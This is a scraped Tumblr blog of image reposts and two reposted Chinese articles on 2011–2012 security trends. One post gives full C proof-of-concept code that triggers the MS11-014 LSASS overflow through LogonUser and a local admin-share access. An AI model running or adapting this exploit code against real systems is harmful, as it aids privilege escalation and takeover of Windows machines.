hehe-yx
hehe-yx
HEHE—Yx
39 posts
Don't wanna be here? Send us removal request.
hehe-yx · 12 years ago
Photo
Tumblr media Tumblr media Tumblr media Tumblr media
69 notes · View notes
hehe-yx · 12 years ago
Photo
Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media
5 notes · View notes
hehe-yx · 12 years ago
Photo
Tumblr media
2K notes · View notes
hehe-yx · 12 years ago
Photo
Tumblr media
Morning Song by ~Renegraphics
308 notes · View notes
hehe-yx · 12 years ago
Photo
Tumblr media
2D Illustrations and character design by Wanchana Intrasombat | Designs Mix on We Heart It - http://weheartit.com/entry/28751135/via/TheDollPhase
199 notes · View notes
hehe-yx · 12 years ago
Photo
Tumblr media
A painting from November. Happy Holidays! 
2K notes · View notes
hehe-yx · 12 years ago
Photo
Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media
Elizabeth Gadd - Breathe (2010 - 2012)
11K notes · View notes
hehe-yx · 12 years ago
Photo
I like
Tumblr media Tumblr media Tumblr media
Landscape Light Sculptures
1K notes · View notes
hehe-yx · 12 years ago
Photo
Tumblr media
0 notes
hehe-yx · 12 years ago
Photo
Tumblr media
1 note · View note
hehe-yx · 13 years ago
Link
0 notes
hehe-yx · 13 years ago
Link
0 notes
hehe-yx · 13 years ago
Link
1 note · View note
hehe-yx · 13 years ago
Text
2011年信息安全行业关键词盘点 • 信息安全综合话题
从 华安信达(CISPS.org)论坛 作者:Ubuntu
      攻击与防御的交替推进是信息安全行业永恒的主题,刚刚过去的2011年也不例外。值此年关临近之际,回顾过去一年里信息安全行业的发展历程,不难发现,一些关键词总是伴随着时间的推进风靡于各大报端,其中“APT高级持续性威胁”、“数据泄露”、“安全操作系统”等等,清晰地勾勒出2011年信息安全行业发展的脉络和前行的方向。对此,业内专家认为,随着信息化应用和IT系统架构日益复杂化,信息安全的“边界”变得越来越模糊,攻与防的重点逐渐向系统核心偏移,服务器操作系统的安全问题得到了更多的关注,这一趋势在RSA令牌身份验证被盗、索尼用户数据泄露等安全事件中表现得尤为突出。 关键词一:APT高级持续性威胁 在信息安全领域,APT高级持续性威胁可谓由来已久,只是,以前进行APT高级持续性威胁多是为了提高或炫耀技术水平,现在则更多为经济利益驱使。作为一种攻击手段或方法,APT大致分为四个阶段:首先,通过Web攻击、数据库攻击等方式突破面向外网的应用系统(如Web服务器、业务系统);其次,在目标网络内部进行挖掘式渗透,找出重要的应用系统和关键IT资产,并窃取相关的管理员账号、密码;再次,利用获取的权限控制服务器操作系统,盗取其中的敏感数据和信息;最后,植入后门程序,清除入侵痕迹,达到长期控制的目的。在这个过程中,攻击者可以采用“0Day”漏洞攻击、社会工程等各种方式对特定目标进行持续性渗透,令人防不胜防。 2011年,最著名的APT事件当数国外知名信息安全厂商RSA令牌身份验证被盗事件,攻击者利用第三方软件漏洞成功安装后门程序,从而侵入RSA企业内网,获得该公司的SecureID双因子认证,并以此为“跳板”盗取大批军工企业和商业公司的敏感数据。由此可以看出,APT具有很强的目的性,在商业利益的驱使下,攻击的最终目标通常是服务器操作系统上的重要数据,这也是2011年数据泄露事件频繁发生的一个重要原因。 关键词二:数据泄露 在进入2012年倒计时的最后十天里,国内知名的开发者社区CSDN曝出被黑客攻击的讯息。在此次攻击中,共有600万用户的个人信息惨遭泄露,其中包括注册邮箱账号和密码。随后,数据泄露事件开始蔓延到社交网站、电子商务网站、社区论坛以及金融等领域,截止目前,已经有上亿网民的账户密码被泄露,成为中国互联网有史以来最大的信息泄露事件,上演了一出岁末年初的“数据泄露门”。事实上,早在2011年年初,索尼在线PlayStation网络就遭到黑客入侵,致使7700万客户的信息泄露。事后,索尼表示攻击使其损失了1.7亿美元。在我国,关于数据泄露的新闻也屡见于报端,其中包括陕西1400万手机用户信息泄露、房地产公司百万套房源信息被盗取等等,从年初延续到了年尾。对信息安全行业来说,2011年已经成为“数据泄露年”。 业内人士指出,近年来,针对企业核心数据的攻击越来越多,数据泄密事件层出不穷。与以往相比,今年的数据泄露无论是在事故发生的频率还是在影响的范围上,都有了大幅的提升,各种规模的企业和机构都难以规避数据泄露带来的危害。这也表明,传统的文档加密、外发管理等单个安全产品的防护或多个加密产品的简单组合,已经很难适应当前的信息安全需求,需要转变安全防护的思路以确保用户的数据安全。 关键词三:安全操作系统 众所周知,服务器操作系统是整个IT系统的核心,承载着重要的数据信息和关键的应用系统。随着攻击技术的不断升级和数据泄露事件的激增,信息安全业界越来越重视服务器操作系统的安全问题。业内人士透露,2011年,在操作系统层面安全产品的评测方面,国家相关法定机构对相关产品的检测有了更全面、更严格的标准和指标检验体系,以此来综合考量安全操作系统的防护水平。从“操作系统安全”到“安全操作系统”的转变,反映出市场对系统层安全产品和解决方案的要求越来越高。 近日,有报道指出,国内信息安全厂商椒图科技在2011年成功研发出的椒图主机安全环境系统(简称JHSE),已通过国标3级检测,成为国内首款通用型的安全操作系统。椒图科技开发的JHSE产品拥有多项国家发明专利和200多项全新技术,通过增强型DTE、RBAC、BLP三种安全模型的相互作用和制约,重构操作系统的安全子系统(SSOOS),免疫APT、数据窃取、恶意代码执行等各种攻击行为,可为操作系统提供全方位的纵深防御体系,与传统安全加固只针对某些功能点进行防御有着本质的区别。 另一方面,与以往人们认知的安全产品不同,椒图科技JHSE是对操作系统安全等级进行动态、透明的提升,不会对原操作系统上应用的业务逻辑和业务连续性造成任何影响,可用于金融、电信、海关、税务等众多领域。目前,JHSE已经通过公安部计算机信息系统安全产品质量监督检验中心的检验,达到了国家等级保护标准《GB/T20272-2006信息安全技术-操作系统安全技术要求》的三级操作系统安全水平,成为我国首款通过国标3级检测的通用型安全操作系统,填补了国内信息安全领域的一大空白,这与当前用户对安全操作系统的需求不谋而合。 关键词四:整体解决方案 除了安全操作系统,用户也很重视整体信息安全防护体系的构建,以确保系统层、应用层、网络层等信息系统各层面的安全。随着IT系统架构越来越复杂,信息安全的防线进一步拉长,无形中拓宽了整体信息安全解决方案的需求空间。在此趋势下,2011年,国内外信息安全厂商加强了与产业链上下游企业的合作,例如启明星辰与网御星云的合并重组、思科收购网络管理安全服务公司PariNetworks、Verizon收购网络和存储安全供应商Terremark等等,通过并购、合作等多种方式,快速扩充企业的产品线和业务范围,增强市场竞争力,以在未来的信息安全市场获得更大的竞争优势。 关键词五:网络战 从信息安全产业大环境上看,当前信息技术与应用已经全面融入人们的工作、学习和生活中,对国民经济和社会发展产生了重要影响。随着竞争的国际化程度进一步提高,信息安全已成为衡量一个国家综合竞争力的关键指标之一。2011年上半年,美国公布了《网络空间国际战略报告》,首次清晰地制定了美国针对网络空间的全盘战略,将针对美国的网络入侵行为进行分级,美国可对最高等级的入侵行为发起传统方式的军事回击。显然,网络空间已经与陆、海、空一样,成为一个独特的军事领域。此外,英国、法国、韩国等国家也在积级组建网络部队,提升本国的网络攻防水平。与往年相比,2011年的“网络战”已经由原来抽象的概念变得更为具象。 业内专家分析指出,在经济全球化的今天,国与国之间的竞争越来越激烈,信息化应用环境的安全风险不断提高,这对国家信息安全保障体系提出了巨大的挑战。服务器操作系统作为信息化建设的重要组成部分,将会在未来面临更多的安全压力。特别是当前普遍使用的商用操作系统如AIX、HP-UX、Solaris、WindowsServer、LinuxServer等大多来自国外,无形中给我国信息安全保障体系埋下了不可预知的安全隐患。这就需要国内信息安全厂商加大技术创新的力度,从底层做起,开发出更多的拥有��主知识产权的信息安全产品和解决方案,为构建自主可控的信息安全防护体系做出贡献。另一方面,也需要更多用户改变传统的信息安全理念,加强服务器操作系统层面的安全防护,通过缔造安全操作系统,来提升信息安全的整体水平,为中国信息化建设持续、健康发展打好“地基”。
0 notes
hehe-yx · 13 years ago
Text
展望2012:六大重要网络安全趋势预测 • 安全沙龙
从 华安信达(CISPS.org)论坛 作者:dan228
      2011年已经过去,那一年网络安全领域发生太多的事情。云计算、移动互联网等新技术得到了大家的认可和广泛的应用,随之而来的网络安全问题也受到了大家的重视。那么,2012年网络安全领域将会是怎样的情形呢? 2011年出现的安全事件说明在网络安全领域,一些公共组织或私营机构仍然存在问题。令这些组织头疼的传统问题包括移动技术,事件响应和管理要求在2012年将加剧。2011年的教训告诉我们不能心存侥幸,企业需要实施策略性的主动网络安全防护,面对安全问题不能一叶蔽目。 1、移动技术安全威胁将是前所未有的 移动技术发展如此迅速以至于在一些企业中部署新技术的需要和压力将超过公司的在安全上的承受能力。而这对于那些准备利用移动应用实施高度定向恶意攻击的人而言已经不是秘密。同样,设备丢失的问题也会扩展到这些新技术以及过去网络安全计划中覆盖不到的设备。例如,医疗设备中用来记录门诊治疗的数码相机对想要窃取病人信息的人就具有很大的吸引力。这类数据的丢失违背了HIPAA隐私法规可能对医疗行业造成严重影响。 2、社交媒体将成为社工行为的帮凶 社交媒体在企业中迅速扩张,它也因此成为恶劣一大威胁。到2012年,社交媒体的资料将成为社工策略的渠道。盗窃信息的人利用社工技术迫使终端用户公开敏感信息,下载恶意软件或是二者兼具。为了应对这种威胁,各公司应该不局限于基础安全策略,还应该使用更高级的技术,如防数据泄漏,高级网络监控和日志文件分析等。 3、中小企业也会成为网络攻击的目标 “黑客行动主义”可能登上新闻头条,但事实上数据盗窃仅仅是寻找企业安全防护中的最薄弱环节而已。之后,再通过这个最薄弱的环节长驱直入获取大量有价值信息。最常见的攻击模式从社工到SQL注入不等。此外,使用没有升级的旧系统也会降低企业的防御能力,企业信息可能因此处于高危状态。 4、随着云服务的普及,相关的数据泄露事件也会层出不穷 从效益角度出发,企业会在节约成本和简化操作的基础上使用云服务。遗憾的是,当前的调查和报告指出现在很多公司在审查云服务商的时候都低估了安全的重要性。2012年,云服务的使用率会增加,新的漏洞会突显这些服务给分析与事件响应带来的挑战,而云安全最终也会得到应有的关注。 5、日志的管理和分析在事件准备与响应中会越来越被重视 安全事件的复杂性与频率在近年都有所增加,最有效的响应方式之一就是为网络和关键应用保留完整日志。虽然这一点在过去没有得到应有的重视,但是日志记录可以为网络行为和安全事件文档的分析提供重要信息。到2012年,各公司会看到各式各样的错误,然后他们就可以部署正式的风险评估来查找安全薄弱环节。 6、事件响应团队在标准商业运营中会持续获得青睐 以前,事件响应团队的成员都是机动性的,只在安全事件发生的时候才会被号召起来。但是为了保持公司在当今市场的竞争力,公司需要将事件响应团队从机动部队升级为常规化的运作。有效的事件响应团队可以是专职进行事件响应的员工也可以是第三方顾问组成的团队。
1 note · View note
hehe-yx · 13 years ago
Text
MS11 - 014
从 BugZone 作者:[email protected] (wpulog)
    Microsoft Windows  本地安全授权子系统服务(LSASS)进程处理特制的身份验证请求时存在权限提升漏洞,攻击者可利用此漏洞以提升的权限执行代码,从而完全控制受影响系统。
// @author      : m_101 // @website     : http://binholic.blogspot.com/ // @licence     : beerware // @year        : 2012 // @reference   : MS11-014 // @source      : Jorge Moura and http://newsoft-tech.blogspot.com/2012/01/ms11-014-this-is-not-bug-your-are.html #include <stdio.h> #include <stdlib.h> #define _WIN32_WINNT 0x0501 #include <windows.h> #include <tchar.h> #include <stdint.h> #define ALPHA_UPPER     "ABCDEFGHIJKLMNOPQRSTUVWXYZ" #define ALPHA_LOWER     "abcdefghijklmnopqrstuvwxyz" #define DIGITS          "0123456789" // create unique pattern (useful for finding eip offset in bof for example) // thanks to the msf project for the algorythm // the code is a dirty hack, could be more optimized unsigned char* pattern_create (size_t szPattern) {     unsigned char **charsets;     size_t *szCharsets, nCharsets, *offsets, idxPattern;     long idxOffset;     //     unsigned char *pattern;     if (!szPattern)         return NULL;     // pattern     pattern = calloc (szPattern + 1, sizeof(*pattern));     if (!pattern)     {         return NULL;     }     // charsets     nCharsets = 3;     charsets = calloc (3, sizeof(*charsets));     // the charsets     charsets[0] = strdup(ALPHA_UPPER);     charsets[1] = strdup(ALPHA_LOWER);     charsets[2] = strdup(DIGITS);     // charsets size     szCharsets = calloc (3, sizeof(*szCharsets));     szCharsets[0] = sizeof(ALPHA_UPPER) - 1;     szCharsets[1] = sizeof(ALPHA_LOWER) - 1;     szCharsets[2] = sizeof(DIGITS) - 1;     // offsets     offsets = calloc (nCharsets, sizeof(*offsets));     // pattern     pattern = calloc (szPattern + 1, sizeof(*pattern));     if (!pattern)     {         // cleanup         goto cleanup;     }     // we construct pattern     idxPattern = 0;     while (idxPattern < szPattern)     {         // concat         //*         for (idxOffset = 0; idxOffset < nCharsets && idxPattern < szPattern; idxOffset++)         {             pattern[idxPattern] = charsets[idxOffset][offsets[idxOffset]];             idxPattern++;         }         //*/         // increment offset if we wrap back to 0         idxOffset = nCharsets - 1;         while (idxOffset >= 0 && ((offsets[idxOffset] = (offsets[idxOffset] + 1) % szCharsets[idxOffset]) == 0))         {             //pattern[idxPattern] = charsets[idxOffset][offsets[idxOffset]];             //idxPattern++;             idxOffset -= 1;         }     }     // cleanup cleanup:     for (idxOffset = 0; idxOffset < nCharsets; idxOffset++)         free(charsets[idxOffset]);     free(charsets);     free(offsets);     free(szCharsets);     return pattern; } char* byte_repeat(uint8_t byte, size_t n) {     char *buffer;     // alloc buffer     buffer = calloc(n+1, sizeof(*buffer));     if (!buffer)         return NULL;     memset(buffer, byte, n);     return buffer; } int main(int argc, char *argv[]) {     char *buffer;     HANDLE hToken;     int idx;     // overflow     for (idx = 0; idx < 2048; idx += 4)     {         buffer = pattern_create(idx);         LogonUser(             _T("username"),             (TCHAR*)buffer,             _T("password"),             LOGON32_LOGON_NEW_CREDENTIALS, // defined as 9             LOGON32_PROVIDER_WINNT50, // defined as 0             &hToken         );         printf("pattern(%5d): %s\n", idx, buffer);         free(buffer);         ImpersonateLoggedOnUser(hToken);     }     // trigger     CreateFile(         _T("\\\\127.0.0.1\\c$\\boot.ini"),         GENERIC_READ,         FILE_SHARE_READ|FILE_SHARE_WRITE,         NULL, // security attributes         OPEN_EXISTING,         FILE_ATTRIBUTE_NORMAL,         NULL     );     return 0; }
6 notes · View notes
hehe-yx · 13 years ago
Photo
Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media
Bird's Nest、Water Cube
0 notes